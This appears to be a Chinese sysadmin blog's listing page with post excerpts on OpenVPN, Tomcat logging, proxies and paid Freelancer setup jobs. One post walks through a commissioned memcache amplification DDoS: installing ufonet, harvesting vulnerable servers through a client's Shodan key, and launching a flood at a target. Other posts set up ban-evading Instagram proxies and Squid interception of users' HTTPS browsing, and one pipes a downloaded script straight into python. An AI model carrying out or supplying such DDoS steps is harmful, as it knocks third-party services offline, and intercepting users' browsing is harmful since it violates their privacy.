Configuring an OpenVPN server that provides an IPv6 tunnel over IPv4

First, a quick primer on IPv6 addresses. An IPv6 address is 128 bits long. The preferred notation is eight groups of numbers separated by colons, where each group is the hexadecimal value of one of the eight 16-bit parts. IPv6 addresses range from 0000:0000:0000:0000:0000:0000:0000:0000 to ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff. Besides this preferred format, an IPv6 address can be written in two shorter forms. Omitting leading zeros: for example, the IPv6 address 1050:0000:0000:0000:0005:0600:300c:326b can be written as 1050:0:0:0:5:600:300c:326b. Double colon: a run of zero groups can be replaced with a double colon (::). For example, the IPv6 address ff06:0:0:0:0:0:0:c3 can be written as ff06::c3. A double colon may be used only once in an address.

In a typical IPv6 network, a LAN subnet is a /64, and an interface obtains its unique IPv6 address via NDP (the first 64 bits are the subnet prefix; the last 64 bits are usually derived from the interface's own MAC address).

Our scenario: the server's IPv4 address is 1.2.3.4. The server's IPv6 address is aaaa:bbbb:cccc:dddd::/64. Both the IPv4 and IPv6 addresses are on eth0. The VPN assigns clients IPv6 addresses from aaaa:bbbb:cccc:dddd:80::/112, using interface tun0.

The configuration goes as follows. First edit /etc/sysctl.conf:

net.ipv4.ip_forward=1
...
net.ipv6.conf.all.forwarding=1
net.ipv6.conf.all.proxy_ndp = 1
...
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0
...
net.ipv4.conf.all.send_redirects = 0

Next, set up iptables so that the OpenVPN server SNATs the packets:

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

or

iptables -t nat -A POSTROUTING -s 10.11.0.0/16 -j SNAT --to 172.16.8.1

Edit the variables in /etc/openvpn/variables ...

January 24, 2024 · 2 min · 297 words · 八戒

The recommended Tomcat access log format

Our Tomcat access log format is:

pattern="%a|%A|%T|%{X-Forwarded-For}i|%l|%u|%t|%r|%s|%b|%{Referer}i|%{User-Agent}i " resolveHosts="false"/>

What does each field mean?

%a - Remote IP address
%A - Local IP address
%b - Bytes sent, excluding HTTP headers, or '-' if zero
%B - Bytes sent, excluding HTTP headers
%h - Remote host name (or IP address if resolveHosts is false)
%H - Request protocol
%l - Remote logical username from identd (always returns '-')
%m - Request method (GET, POST, etc.)
%p - Local port on which this request was received
%q - Query string (prepended with a '?' if it exists)
%r - First line of the request (method and request URI)
%s - HTTP status code of the response
%S - User session ID
%t - Date and time, in Common Log Format
%u - Remote user that was authenticated (if any), else '-'
%U - Requested URL path
%v - Local server name
%D - Time taken to process the request, in millis
%T - Time taken to process the request, in seconds
%I - Current request thread name (can compare later with stacktraces)

In addition, request query parameters, session attribute values, cookie values, and HTTP request/response header values can also be written to the log file. ...

January 24, 2024 · 1 min · 203 words · 八戒

Freelancer task #1: multiple IPs, layered anonymous proxies, with authentication

There is a proxy setup task on Freelancer:

Project Description: Hi, I would like to create a new VPS proxy server with multiple IPs on the same VPS. Are you able to do that? What OS do you prefer? - I have 10 ips. - I want them to be as much anonymous as you can. - I would have an Username and Password as auth, but if needed the possibility to have an IP authentication too. My budget is: ~20$ Thank you in advance.

Honestly, 10 IPs are unnecessary; a single IP is enough, using Tor + polipo. ...

January 24, 2024 · 2 min · 218 words · 八戒

Freelancer task #2: building a scramble-obfuscated OpenVPN

This one is odd. After looking into it, the original author says: I have created a patch which introduces some forms of scrambling to the packet payload of any OpenVPN connection. I have been successfully using the patch with Iranian and Chinese users for some time now.

So Iran is pretty bad too. Speechless. Given that OpenVPN cannot be set up at 森华易腾, I don't know whether they simply blocked UDP port 1194 or blocked OpenVPN at the protocol level; either way, it's all shit.

In short, the patch obfuscates the OpenVPN protocol and adds one configuration option, the scramble parameter:

scramble reverse # reverses the transmitted data; usually this alone is enough to get past the detection in China and Iran
scramble xorptrpos # XORs the payload of each transmitted packet
scramble obfuscate password # the strongest: reverse + XOR + password, all three combined. "password" is the password you set

With this option in place, it is recommended to set cipher none, because after this there is no need to specify a cipher any more. Also, a cipher consumes CPU, and scramble consumes less CPU than a cipher does.

Let's build one and try it. Here we use OpenVPN 2.4.4 and the corresponding patch. Download: 2.4.4.zip master.zip

#centos
yum -y install unzip
yum -y groupinstall "development tools"
#ubuntu
apt update
apt install build-essential unzip

unzip -x 2.4.4.zip
unzip -x master.zip

Apply the patch: ...

January 24, 2024 · 3 min · 587 words · 八戒

Freelancer task #3: Setup Proxy on VPS for Instagram

The task requirements are: • Multiple subnets to avoid bans • I need the proxies to have the ability of User:Pass • Proxy needs to be Residential IPv6

A reference was also given: https://www.blackhatworld.com/seo/never-buy-proxies-again-setup-your-own-proxy-server.872539/

Hmm, fairly interesting. Following the link he gave:

Step 1: go to LowEndBox.com or Webhostingtalk.com and find a VPS provider with a good reputation that offers additional IPs; usually an additional IP costs $1 per month.

Step 2: buy a VPS with 1 GB of RAM, 1 core, 100 Mbps bandwidth, and 10 additional IPs. Such a VPS is usually $5 per month, plus $10 per month for the 10 IPs, $15 per month in total, about 100 RMB, and you then have 11 usable IPs. Since this task requires multiple subnets, buy several from the same provider in different locations, e.g. one in Los Angeles, one in Texas, one in New York, each with 10 additional IPs.

Step 3: install the proxy software. Download 3proxy:

wget http://img.rendoumi.com/soft/3proxy/0.8.11.tar.gz
tar zxvf 0.8.11.tar.gz

Build and install:

cd 3proxy-0.8.11
sed -i 's/^prefix.*/prefix=\/usr\/local\/3proxy/' Makefile.Linux
sed -i '/DENY.*/a #define ANONYMOUS 1' src/proxy.h
make -f Makefile.Linux
make -f Makefile.Linux install

Note that above I installed into /usr/local/3proxy; adjust this as needed.

Let's see what the sample configuration contains:

cat cfg/3proxy.cfg.sample |grep -v ^# | grep -v ^$

nserver 10.1.2.1
nserver 10.2.2.2
nscache 65536
timeouts 1 5 30 60 180 1800 15 60
users 3APA3A:CL:3apa3a "test:CR:$1$qwer$CHFTUFGqkjue9HyhcMHEe1"
service
log c:\3proxy\logs\3proxy.log D
logformat "- +_L%t.%. %N.%p %E %U %C:%c %R:%r %O %I %h %T"
archiver rar rar a -df -inul %A %F
rotate 30
auth iponly
external 10.1.1.1
internal 192.168.1.1
auth none
dnspr
auth strong
deny * * 127.0.0.1,192.168.1.1
allow * * * 80-88,8080-8088 HTTP
allow * * * 443,8443 HTTPS
proxy -n
auth none
pop3p
tcppm 25 mail.my.provider 25
auth strong
flush
allow 3APA3A,test
maxconn 20
socks
auth strong
flush
internal 127.0.0.1
allow 3APA3A 127.0.0.1
maxconn 3
admin

A pile of useless configuration; remove all of it. ...

January 24, 2024 · 2 min · 266 words · 八戒

Freelancer task #4: viewing users' browsing history with Squid

This requirement is also fairly simple: User Browsing Log for Open VPN server. In short, users connect to his OpenVPN server and browse other sites through the Squid proxy on it; the special part is that he needs to see the users' HTTP and HTTPS browsing history. Squid runs as a transparent proxy, so it can capture the browsing history and provide caching at the same time.

The server is Ubuntu, and the default Squid package does not support SSL, so it has to be rebuilt.

Install the dependencies:

sudo apt-get install build-essential fakeroot devscripts gawk gcc-multilib dpatch
sudo apt-get build-dep squid3
sudo apt-get build-dep openssl
sudo apt-get install libssl-dev
sudo apt-get source squid3

This downloads the Squid source code and the Ubuntu patch package; extract and unpack them:

tar zxvf squid3_3.5.12.orig.tar.gz
cd squid3-3.5.12
tar xf ../squid3_3.5.12-1ubuntu7.5.debian.tar.xz

Change the build options to add SSL support:

vi debian/rules

Add --with-openssl --enable-ssl --enable-ssl-crtd under the DEB_CONFIGURE_EXTRA_FLAGS section.

DEB_CONFIGURE_EXTRA_FLAGS := BUILDCXXFLAGS="$(CXXFLAGS) $(LDFLAGS)" \
...
--with-default-user=proxy \
--with-openssl \
--enable-ssl \
--enable-ssl-crtd
...

Build; this produces 7 deb packages ...

January 24, 2024 · 4 min · 662 words · 八戒

Freelancer task #5: multi-link bonded VPN

This task is interesting. Task description: we need a set of vpn server / client programmed for embedded linux (or windows) to bond multiple 4g lte modems or wifi connections and stitch them back together on server side to stream video feeds. the connection must be stable and have the maximum available bandwidth with no drop in some connection drops. similar to service called SPEEDIFY (but it doesn't work well) this can be also achieved by splitting video packets and send them through different links and stitch the video packets back on the server side.

In short, it is most likely an embedded system, a Raspberry Pi or NanoPi or the like, with 4G modems attached, and they want to bond the links to upload streaming video. ...

January 24, 2024 · 1 min · 98 words · 八戒

Freelancer task #6: Compile an ipk file on LEDE (OpenWrt)

This was a failed task, and it would fail again if I did it over, because there was no way to verify the result. Really shitty: it cost me a $10 fee. Writing it down as a lesson.

The task: Job would be to compile an ipk file of SHC that would work with LEDE OS (openwrt) and the processor used in our system - will provide details. SHC can be downloaded here: http://www.datsi.fi.upm.es/~frosal/ I think you must have a 64 bit system to use the SDK to compile the file

In other words: compile SHC for the OpenWrt platform and make it work. The complete steps are as follows.

How to compile SHC on LEDE:

Tested build environment:
OS: Ubuntu 14.04.5 LTS
CPU: ARMv7 Processor rev 5 (v7l)

Before you begin, check that your system is updated, i.e.

sudo apt-get update
sudo apt-get upgrade
sudo apt-get autoremove

Step-by-step manual. Note: perform all steps as a regular (non-root) user. The user must be in the sudo group.

1. Update your sources

sudo apt-get update

2. Install the necessary packages:

sudo apt-get install g++ libncurses5-dev zlib1g-dev bison flex unzip autoconf gawk make gettext gcc binutils patch bzip2 libz-dev asciidoc subversion sphinxsearch libtool sphinx-common libssl-dev libssl0.9.8

3. Get the latest LEDE source from the git repository. We know our CPU is armv7, which belongs to arm64, so go to http://downloads.lede-project.org/releases and just download the SDK.

wget http://downloads.lede-project.org/releases/17.01.4/targets/arm64/generic/lede-sdk-17.01.4-arm64_gcc-5.4.0_musl-1.1.16.Linux-x86_64.tar.xz

4. No need to update and install all LEDE packages. We just want to compile shc, not other packages, so don't update.

5. Run 'make menuconfig' (just Save and Exit).

6. Get the SHC sources into the LEDE package tree (we are in the source directory, and shc-3.8.9b.tgz is there too):

wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.9b.tgz
mkdir -p package/shc/src
tar xvf shc-3.8.9b.tgz -C package/shc/src --strip-components 1

7. Write the ipk Makefile:

vi package/shc/Makefile

##############################################
# OpenWrt Makefile for shc program
#
#
# Most of the variables used here are defined in
# the include directives below. We just need to
# specify a basic description of the package,
# where to build our program, where to find
# the source files, and where to install the
# compiled program on the router.
#
# Be very careful of spacing in this file.
# Indents should be tabs, not spaces, and
# there should be no trailing whitespace in
# lines that are not commented.
#
##############################################

include $(TOPDIR)/rules.mk

# Name and release number of this package
PKG_NAME:=shc
PKG_VERSION:=3.8.9b
PKG_MAINTAINER:=Francisco, Rosales, <frosal@fi.upm.es>

# This specifies the directory where we're going to build the program.
# The root build directory, $(BUILD_DIR), is by default the build_mipsel
# directory in your OpenWrt SDK directory
PKG_BUILD_DIR := $(BUILD_DIR)/$(PKG_NAME)

include $(INCLUDE_DIR)/package.mk

# Specify package information for this program.
# The variables defined here should be self explanatory.
# If you are running Kamikaze, delete the DESCRIPTION
# variable below and uncomment the Kamikaze define
# directive for the description below
define Package/$(PKG_NAME)
	SECTION:=utils
	CATEGORY:=Utilities
	TITLE:= shc ---- This tool generates a stripped binary executable version of the script specified at command line.
	URL:=http://www.datsi.fi.upm.es/~frosal
endef

# Uncomment portion below for Kamikaze and delete DESCRIPTION variable above
define Package/$(PKG_NAME)/description
	shc ---- This tool generates a stripped binary executable version of the script specified at command line.
endef

# Specify what needs to be done to prepare for building the package.
# In our case, we need to copy the source files to the build directory.
# This is NOT the default. The default uses the PKG_SOURCE_URL and the
# PKG_SOURCE which is not defined here to download the source from the web.
# In order to just build a simple program that we have just written, it is
# much easier to do it this way.
define Build/Prepare
	mkdir -p $(PKG_BUILD_DIR)
	$(CP) ./src/* $(PKG_BUILD_DIR)/
endef

# We do not need to define Build/Configure or Build/Compile directives
# The defaults are appropriate for compiling a simple program such as this one

# Specify where and how to install the program. Since we only have one file,
# the shc executable, install it by copying it to the /bin directory on
# the router. The $(1) variable represents the root directory on the router running
# OpenWrt. The $(INSTALL_DIR) variable contains a command to prepare the install
# directory if it does not already exist. Likewise $(INSTALL_BIN) contains the
# command to copy the binary file from its current location (in our case the build
# directory) to the install directory.
define Package/$(PKG_NAME)/install
	$(INSTALL_DIR) $(1)/bin
	$(INSTALL_BIN) $(PKG_BUILD_DIR)/shc $(1)/bin/
endef

# This line executes the necessary commands to compile our program.
# The above define directives specify all the information needed, but this
# line calls BuildPackage which in turn actually uses this information to
# build a package.
$(eval $(call BuildPackage,$(PKG_NAME)))

8. Compile the shc ipk:

make package/shc/compile V=99

9. The build completes without errors. Now we have:

binary packages directory: source/bin/packages/aarch64_armv8-a/
[SHC_BIN] = ./bin/packages/aarch64_armv8-a/base/shc_3.8.9b_aarch64_armv8-a.ipk

10. Copy and install the SHC .ipk to the LEDE device:

scp shc_3.8.9b_aarch64_armv8-a.ipk root@<LEDE device IP address or name>:/tmp/
ssh root@<LEDE device IP address or name> #IP usually 192.168.1.1
opkg install shc_3.8.9b_aarch64_armv8-a.ipk

11. Create a test script, compile it, and execute it (in the LEDE shell):

ssh root@<LEDE device IP address or name> #IP usually 192.168.1.1
vi /tmp/1.sh
#!/bin/sh
echo "hahahaha"

shc -v -f /tmp/1.sh
/tmp/1.sh.x

There are a few things to note here. One is that many tutorials online start right off with ...

January 24, 2024 · 5 min · 876 words · 八戒

Freelancer task #7: memcache amplification attack

This was a job where I nearly lost money; in the end I got my fee back through a dispute, so I worked for nothing. Really unlucky. A Korean wanted a reflection attack.

First clone the project:

git clone https://github.com/epsylon/ufonet

The principle is clear: through the memcache vulnerability (memcache, astonishingly, speaks UDP), spoof the source address and send a pile of requests to vulnerable memcache servers, which causes a reflection attack. Where does a pile of vulnerable machines come from? This Korean actually had a Shodan API key (Shodan, "hand grenade"?). With his account you can indeed see a pile of vulnerable machines: [Shodan API key redacted].

Install Python:

wget https://www.python.org/ftp/python/2.7.14/Python-2.7.14.tgz
tar zxvf Python-2.7.14.tgz
cd Python-2.7.14
./configure --prefix=/export/servers/Python2714
make
make install
wget -O- "https://bootstrap.pypa.io/get-pip.py" | /export/servers/Python2714/bin/python
/export/servers/Python2714/bin/pip install pycurl
/export/servers/Python2714/bin/pip install geoip
/export/servers/Python2714/bin/pip install whois
/export/servers/Python2714/bin/pip install crypto
/export/servers/Python2714/bin/pip install request

First fetch the list of vulnerable machines:

cd ufonet
/export/servers/Python2714/bin/python ./ufonet --sd 'botnet/dorks.txt' --sa

Bombard:

/export/servers/Python2714/bin/python ./ufonet -a http://target.com -r 10000 --threads 2000

January 24, 2024 · 1 min · 61 words · 八戒

Freelancer task #8: DNS dispatching for OpenVPN

The client handed me a tricky problem: he has set up an OpenVPN server and has two DNS servers, one with ad filtering and one without. The two DNS services run on the same machine on different ports. He wants something configured on the OpenVPN client side so that different users use different DNS servers. After a long search, there is no configuration option that can change the DNS port. So, a workaround.

The plan: give the clients fixed IPs and dispatch to different DNS servers based on the source IP. Originally I wanted to use glider, written by a guy on V2EX, but after fiddling with it for ages I couldn't figure out how to configure it, although it can certainly do the job; worst case, I'd modify the Go code myself. For speed, I used another guy's dns-dispatcher, which does exactly DNS dispatching; glider is a full-blown proxy forwarder with proxy chains, very powerful.

Clone the dns-dispatcher code:

git clone https://github.com/cathuhoo/dns-dispatcher

Build:

make

Configure; we only configure UDP port 53, the standard DNS port:

vi dns-dispatch.config
; This is a test configuration file
[main]
file_resolvers = resolvers.txt
file_policy = policy.txt
file_log = /var/log/dns-dispatch.log
file_pid = /var/run/dns-dispatch.pid
num_threads = 3
service_port = 53
#tcpservice_port = 53
daemonize = yes

Configure the policy:

vi policy.txt
ip2 | * | Forward:bind2
ip1 | * | Forward:bind1

Configure ip1 and ip2:

vi ip1
10.10.1.2
vi ip2
10.10.1.3

Configure bind1 and bind2; the two DNS servers are on 10.10.1.1, ports 5301 and 5302:

vi resolvers.txt
bind1|10.10.1.1|5301
bind2|10.10.1.1|5302

Run:

sudo ./dns-dispatch -c dns-dispatch.config

OK, done. All the configuration lives in files; there are other ways to use it too, so read the docs yourself if you use it. ...

January 24, 2024 · 1 min · 90 words · 八戒